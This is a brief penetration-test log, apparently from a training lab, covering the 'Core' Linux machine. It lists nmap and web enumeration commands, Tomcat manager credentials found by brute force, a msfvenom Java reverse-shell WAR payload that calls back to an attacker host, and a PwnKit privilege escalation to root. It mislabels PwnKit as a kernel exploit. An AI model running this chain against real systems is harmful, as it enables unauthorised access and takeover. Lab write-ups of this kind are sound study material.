Core
๐งช Pentest Log: {{date:2025-09-02}}
๐ Target Information
- Machine Name: Core
- IP Address: 10.11.1.160
- Operating System: Linux
ip=10.11.1.160
๐ก Enumeration
๐ Port Scanning
Command Used
ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt
nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt
Port 22
Port 80
Web Content Enumeration
gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt
dirsearch -u http://$ip -r -o dirsearch.txt
wpscan --url http://$ip
Port 8080
Web Content Enumeration
gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt
dirsearch -u http://$ip -r -o dirsearch.txt
wpscan --url http://$ip
Tomcat 6.0.24
Found /manager/html entry, use auxiliary/scanner/http/tomcat_mgr_login, gain credential
tomcat:s3cret
๐ฃ Exploitation
๐ Vulnerability Summary
- Service / Port: 8080
- Vulnerability Type: Arbitary File Upload
๐ Exploit Execution
๐ง Exploit Method
Tool / Script Used:
msfvenom -p java/shell_reverse_tcp LHOST=172.16.1.1 LPORT=80 -f war -o shell.war
๐งฌ Privilege Escalation
๐ค Current Access
- User: tomcat6
- Groups: 120(tomcat6)
- Shell Type: reverse shell
๐ Enumeration
Kernel Check:
uname -a
found
Linux core 2.6.32-21-generic-pae #32-Ubuntu SMP Fri Apr 16 09:39:35 UTC 2010 i686 GNU/Linux
๐ Privilege Escalation Exploit
๐ Exploit Summary
- Technique Used: Kernel Exploit
- Target Binary/Service: N/A
- Reference / Source: https://github.com/ly4k/PwnKit
๐ง Exploit Steps
- Smash to root
chmod +x PwnKit32
./PwnKit32
- Key File
0gdm4wqo1yb7ar7us1as